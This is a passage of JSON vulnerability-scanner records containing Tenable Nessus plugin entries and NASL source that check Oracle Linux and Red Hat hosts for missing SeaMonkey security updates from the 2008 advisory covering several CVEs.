unsafe drag-and-drop action. (CVE-2008-3837)\n\nA flaw was found in SeaMonkey that caused certain characters to be stripped from JavaScript code. This flaw could allow malicious JavaScript to bypass or evade script filters. (CVE-2008-4065, CVE-2008-4066)\n\nAll SeaMonkey users should upgrade to these updated packages, which contain backported patches to resolve these issues.", "edition": 6, "reporter": "Tenable", "published": "2013-07-12T00:00:00", "title": "Oracle Linux 3 / 4 : seamonkey (ELSA-2008-0882)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Oracle Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3835", "CVE-2008-4067", "CVE-2008-4066", "CVE-2008-4069", "CVE-2008-0016", "CVE-2008-4059", "CVE-2008-3837", "CVE-2008-4062", "CVE-2008-4060", "CVE-2008-4058", "CVE-2008-4068", "CVE-2008-4061", "CVE-2008-4065"], "modified": "2018-07-18T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:seamonkey-nspr-devel", "p-cpe:/a:oracle:linux:seamonkey-mail", "p-cpe:/a:oracle:linux:seamonkey-devel", "p-cpe:/a:oracle:linux:seamonkey-nss-devel", "p-cpe:/a:oracle:linux:devhelp", "p-cpe:/a:oracle:linux:seamonkey", "p-cpe:/a:oracle:linux:seamonkey-nspr", "cpe:/o:oracle:linux:3", "p-cpe:/a:oracle:linux:seamonkey-dom-inspector", "p-cpe:/a:oracle:linux:seamonkey-nss", "cpe:/o:oracle:linux:4", "p-cpe:/a:oracle:linux:seamonkey-js-debugger", "p-cpe:/a:oracle:linux:seamonkey-chat", "p-cpe:/a:oracle:linux:devhelp-devel"], "id": "ORACLELINUX_ELSA-2008-0882.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=67745", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2008:0882 and \n# Oracle Linux Security Advisory ELSA-2008-0882 respectively.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(67745);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/07/18 17:43:56\");\n\n script_cve_id(\"CVE-2008-0016\", \"CVE-2008-3835\", \"CVE-2008-3837\", \"CVE-2008-4058\", \"CVE-2008-4059\", \"CVE-2008-4060\", \"CVE-2008-4061\", \"CVE-2008-4062\", \"CVE-2008-4065\", \"CVE-2008-4066\", \"CVE-2008-4067\", \"CVE-2008-4068\", \"CVE-2008-4069\");\n script_bugtraq_id(31346);\n script_xref(name:\"RHSA\", value:\"2008:0882\");\n\n script_name(english:\"Oracle Linux 3 / 4 : seamonkey (ELSA-2008-0882)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2008:0882 :\n\nUpdated SeaMonkey packages that fix a security issues are now\navailable for Red Hat Enterprise Linux 2.1, Red Hat Enterprise Linux 3\nand Red Hat Enterprise Linux 4.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nSeaMonkey is an open source Web browser, advanced email and newsgroup\nclient, IRC chat client, and HTML editor.\n\nSeveral flaws were found in the processing of malformed web content. A\nweb page containing malicious content could cause SeaMonkey to crash\nor, potentially, execute arbitrary code as the user running SeaMonkey.\n(CVE-2008-0016, CVE-2008-4058, CVE-2008-4059, CVE-2008-4060,\nCVE-2008-4061, CVE-2008-4062)\n\nSeveral flaws were found in the way malformed web content was\ndisplayed. A web page containing specially crafted content could\npotentially trick a SeaMonkey user into surrendering sensitive\ninformation. (CVE-2008-3835, CVE-2008-4067, CVE-2008-4068,\nCVE-2008-4069)\n\nA flaw was found in the way SeaMonkey handles mouse click events. A\nweb page containing specially crafted JavaScript code could move the\ncontent window while a mouse-button was pressed, causing any item\nunder the pointer to be dragged. This could, potentially, cause the\nuser to perform an unsafe drag-and-drop action. (CVE-2008-3837)\n\nA flaw was found in SeaMonkey that caused certain characters to be\nstripped from JavaScript code. This flaw could allow malicious\nJavaScript to bypass or evade script filters. (CVE-2008-4065,\nCVE-2008-4066)\n\nAll SeaMonkey users should upgrade to these updated packages, which\ncontain backported patches to resolve these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2008-September/000739.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2008-September/000740.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected seamonkey packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(22, 79, 119, 189, 200, 264, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:devhelp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:devhelp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:seamonkey\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:seamonkey-chat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:seamonkey-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:seamonkey-dom-inspector\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:seamonkey-js-debugger\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:seamonkey-mail\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:seamonkey-nspr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:seamonkey-nspr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:seamonkey-nss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:seamonkey-nss-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(3|4)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 3 / 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"seamonkey-1.0.9-0.24.0.1.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"seamonkey-1.0.9-0.24.0.1.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"seamonkey-chat-1.0.9-0.24.0.1.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"seamonkey-chat-1.0.9-0.24.0.1.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"seamonkey-devel-1.0.9-0.24.0.1.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"seamonkey-devel-1.0.9-0.24.0.1.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"seamonkey-dom-inspector-1.0.9-0.24.0.1.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"seamonkey-dom-inspector-1.0.9-0.24.0.1.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"seamonkey-js-debugger-1.0.9-0.24.0.1.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"seamonkey-js-debugger-1.0.9-0.24.0.1.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"seamonkey-mail-1.0.9-0.24.0.1.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"seamonkey-mail-1.0.9-0.24.0.1.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"seamonkey-nspr-1.0.9-0.24.0.1.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"seamonkey-nspr-1.0.9-0.24.0.1.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"seamonkey-nspr-devel-1.0.9-0.24.0.1.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"seamonkey-nspr-devel-1.0.9-0.24.0.1.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"seamonkey-nss-1.0.9-0.24.0.1.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"seamonkey-nss-1.0.9-0.24.0.1.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"seamonkey-nss-devel-1.0.9-0.24.0.1.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"seamonkey-nss-devel-1.0.9-0.24.0.1.el3\")) flag++;\n\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"devhelp-0.10-0.10.el4\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"devhelp-0.10-0.10.el4\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"devhelp-devel-0.10-0.10.el4\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"devhelp-devel-0.10-0.10.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"seamonkey-1.0.9-26.0.1.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"seamonkey-chat-1.0.9-26.0.1.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"seamonkey-devel-1.0.9-26.0.1.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"seamonkey-dom-inspector-1.0.9-26.0.1.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"seamonkey-js-debugger-1.0.9-26.0.1.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"seamonkey-mail-1.0.9-26.0.1.el4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"devhelp / devhelp-devel / seamonkey / seamonkey-chat / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:53:04", "references": ["https://www.redhat.com/security/data/cve/CVE-2008-3837.html", "https://www.redhat.com/security/data/cve/CVE-2008-4065.html", "https://www.redhat.com/security/data/cve/CVE-2008-4066.html", "https://www.redhat.com/security/data/cve/CVE-2008-3835.html", "https://www.redhat.com/security/data/cve/CVE-2008-0016.html", "https://www.redhat.com/security/data/cve/CVE-2008-4058.html", "https://www.redhat.com/security/data/cve/CVE-2008-4059.html", "https://www.redhat.com/security/data/cve/CVE-2008-4061.html", "http://rhn.redhat.com/errata/RHSA-2008-0882.html", "https://www.redhat.com/security/data/cve/CVE-2008-4062.html", "https://www.redhat.com/security/data/cve/CVE-2008-4069.html", "https://www.redhat.com/security/data/cve/CVE-2008-4067.html", "https://www.redhat.com/security/data/cve/CVE-2008-4060.html", "https://www.redhat.com/security/data/cve/CVE-2008-4068.html"], "pluginID": "34275", "description": "Updated SeaMonkey packages that fix a security issues are now available for Red Hat Enterprise Linux 2.1, Red Hat Enterprise Linux 3 and Red Hat Enterprise Linux 4.\n\nThis update has been rated as having critical security impact by the Red Hat Security Response Team.\n\nSeaMonkey is an open source Web browser, advanced email and newsgroup client, IRC chat client, and HTML editor.\n\nSeveral flaws were found in the processing of malformed web content. A web page containing malicious content could cause SeaMonkey to crash or, potentially, execute arbitrary code as the user running SeaMonkey.\n(CVE-2008-0016, CVE-2008-4058, CVE-2008-4059, CVE-2008-4060, CVE-2008-4061, CVE-2008-4062)\n\nSeveral flaws were found in the way malformed web content was displayed. A web page containing specially crafted content could potentially trick a SeaMonkey user into surrendering sensitive information. (CVE-2008-3835, CVE-2008-4067, CVE-2008-4068, CVE-2008-4069)\n\nA flaw was found in the way SeaMonkey handles mouse click events. A web page containing specially crafted JavaScript code could move the content window while a mouse-button was pressed, causing any item under the pointer to be dragged. This could, potentially, cause the user to perform an unsafe drag-and-drop action. (CVE-2008-3837)\n\nA flaw was found in SeaMonkey that caused certain characters to be stripped from JavaScript code. This flaw could allow malicious JavaScript to bypass or evade script filters. (CVE-2008-4065, CVE-2008-4066)\n\nAll SeaMonkey users should upgrade to these updated packages, which contain backported patches to resolve these issues.", "edition": 6, "reporter": "Tenable", "published": "2008-09-24T00:00:00", "title": "RHEL 2.1 / 3 / 4 : seamonkey (RHSA-2008:0882)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3835", "CVE-2008-4067", "CVE-2008-4066", "CVE-2008-4069", "CVE-2008-0016", "CVE-2008-4059", "CVE-2008-3837", "CVE-2008-4062", "CVE-2008-4060", "CVE-2008-4058", "CVE-2008-4068", "CVE-2008-4061", "CVE-2008-4065"], "modified": "2018-07-25T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:3", "cpe:/o:redhat:enterprise_linux:4", "cpe:/o:redhat:enterprise_linux:2.1", "p-cpe:/a:redhat:enterprise_linux:seamonkey", "p-cpe:/a:redhat:enterprise_linux:seamonkey-nss-devel", "p-cpe:/a:redhat:enterprise_linux:seamonkey-nspr", "p-cpe:/a:redhat:enterprise_linux:seamonkey-js-debugger", "p-cpe:/a:redhat:enterprise_linux:seamonkey-devel", "p-cpe:/a:redhat:enterprise_linux:seamonkey-nss", "p-cpe:/a:redhat:enterprise_linux:devhelp-devel", "cpe:/o:redhat:enterprise_linux:4.7", "p-cpe:/a:redhat:enterprise_linux:seamonkey-mail", "p-cpe:/a:redhat:enterprise_linux:devhelp", "p-cpe:/a:redhat:enterprise_linux:seamonkey-nspr-devel", "p-cpe:/a:redhat:enterprise_linux:seamonkey-chat", "p-cpe:/a:redhat:enterprise_linux:seamonkey-dom-inspector"], "id": "REDHAT-RHSA-2008-0882.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=34275", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2008:0882. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(34275);\n script_version (\"1.21\");\n script_cvs_date(\"Date: 2018/07/25 18:58:05\");\n\n script_cve_id(\"CVE-2008-0016\", \"CVE-2008-3835\", \"CVE-2008-3837\", \"CVE-2008-4058\", \"CVE-2008-4059\", \"CVE-2008-4060\", \"CVE-2008-4061\", \"CVE-2008-4062\", \"CVE-2008-4065\", \"CVE-2008-4066\", \"CVE-2008-4067\", \"CVE-2008-4068\", \"CVE-2008-4069\");\n script_bugtraq_id(31346);\n script_xref(name:\"RHSA\", value:\"2008:0882\");\n\n script_name(english:\"RHEL 2.1 / 3 / 4 : seamonkey (RHSA-2008:0882)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated SeaMonkey packages that fix a security issues are now\navailable for Red Hat Enterprise Linux 2.1, Red Hat Enterprise Linux 3\nand Red Hat Enterprise Linux 4.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nSeaMonkey is an open source Web browser, advanced email and newsgroup\nclient, IRC chat client, and HTML editor.\n\nSeveral flaws were found in the processing of malformed web content. A\nweb page containing malicious content could cause SeaMonkey to crash\nor, potentially, execute arbitrary code as the user running SeaMonkey.\n(CVE-2008-0016, CVE-2008-4058, CVE-2008-4059, CVE-2008-4060,\nCVE-2008-4061, CVE-2008-4062)\n\nSeveral flaws were found in the way malformed web content was\ndisplayed. A web page containing specially crafted content could\npotentially trick a SeaMonkey user into surrendering sensitive\ninformation. (CVE-2008-3835, CVE-2008-4067, CVE-2008-4068,\nCVE-2008-4069)\n\nA flaw was found in the way SeaMonkey handles mouse click events. A\nweb page containing specially crafted JavaScript code could move the\ncontent window while a mouse-button was pressed, causing any item\nunder the pointer to be dragged. This could, potentially, cause the\nuser to perform an unsafe drag-and-drop action. (CVE-2008-3837)\n\nA flaw was found in SeaMonkey that caused certain characters to be\nstripped from JavaScript code. This flaw could allow malicious\nJavaScript to bypass or evade script filters. (CVE-2008-4065,\nCVE-2008-4066)\n\nAll SeaMonkey users should upgrade to these updated packages, which\ncontain backported patches to resolve these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2008-0016.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2008-3835.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2008-3837.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2008-4058.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2008-4059.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2008-4060.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2008-4061.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2008-4062.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2008-4065.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2008-4066.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2008-4067.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2008-4068.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2008-4069.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2008-0882.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(22, 79, 119, 189, 200, 264, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:devhelp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:devhelp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:seamonkey\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:seamonkey-chat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:seamonkey-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:seamonkey-dom-inspector\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:seamonkey-js-debugger\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:seamonkey-mail\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:seamonkey-nspr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:seamonkey-nspr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:seamonkey-nss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:seamonkey-nss-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:2.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.7\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/09/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/09/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(2\\.1|3|4)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 2.1 / 3.x / 4.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2008:0882\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"seamonkey-1.0.9-0.20.el2\")) flag++;\n\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"seamonkey-chat-1.0.9-0.20.el2\")) flag++;\n\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"seamonkey-devel-1.0.9-0.20.el2\")) flag++;\n\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"seamonkey-dom-inspector-1.0.9-0.20.el2\")) flag++;\n\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"seamonkey-js-debugger-1.0.9-0.20.el2\")) flag++;\n\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"seamonkey-mail-1.0.9-0.20.el2\")) flag++;\n\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"seamonkey-nspr-1.0.9-0.20.el2\")) flag++;\n\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"seamonkey-nspr-devel-1.0.9-0.20.el2\")) flag++;\n\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"seamonkey-nss-1.0.9-0.20.el2\")) flag++;\n\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"seamonkey-nss-devel-1.0.9-0.20.el2\")) flag++;\n\n\n if (rpm_check(release:\"RHEL3\", reference:\"seamonkey-1.0.9-0.24.el3\")) flag++;\n\n if (rpm_check(release:\"RHEL3\", reference:\"seamonkey-chat-1.0.9-0.24.el3\")) flag++;\n\n if (rpm_check(release:\"RHEL3\", reference:\"seamonkey-devel-1.0.9-0.24.el3\")) flag++;\n\n if (rpm_check(release:\"RHEL3\", reference:\"seamonkey-dom-inspector-1.0.9-0.24.el3\")) flag++;\n\n if (rpm_check(release:\"RHEL3\", reference:\"seamonkey-js-debugger-1.0.9-0.24.el3\")) flag++;\n\n if (rpm_check(release:\"RHEL3\", reference:\"seamonkey-mail-1.0.9-0.24.el3\")) flag++;\n\n if (rpm_check(release:\"RHEL3\", reference:\"seamonkey-nspr-1.0.9-0.24.el3\")) flag++;\n\n if (rpm_check(release:\"RHEL3\", reference:\"seamonkey-nspr-devel-1.0.9-0.24.el3\")) flag++;\n\n if (rpm_check(release:\"RHEL3\", reference:\"seamonkey-nss-1.0.9-0.24.el3\")) flag++;\n\n if (rpm_check(release:\"RHEL3\", reference:\"seamonkey-nss-devel-1.0.9-0.24.el3\")) flag++;\n\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"devhelp-0.10-0.10.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"devhelp-0.10-0.10.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"devhelp-devel-0.10-0.10.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"devhelp-devel-0.10-0.10.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"seamonkey-1.0.9-26.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"seamonkey-chat-1.0.9-26.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"seamonkey-devel-1.0.9-26.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"seamonkey-dom-inspector-1.0.9-26.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"seamonkey-js-debugger-1.0.9-26.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"seamonkey-mail-1.0.9-26.el4\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + 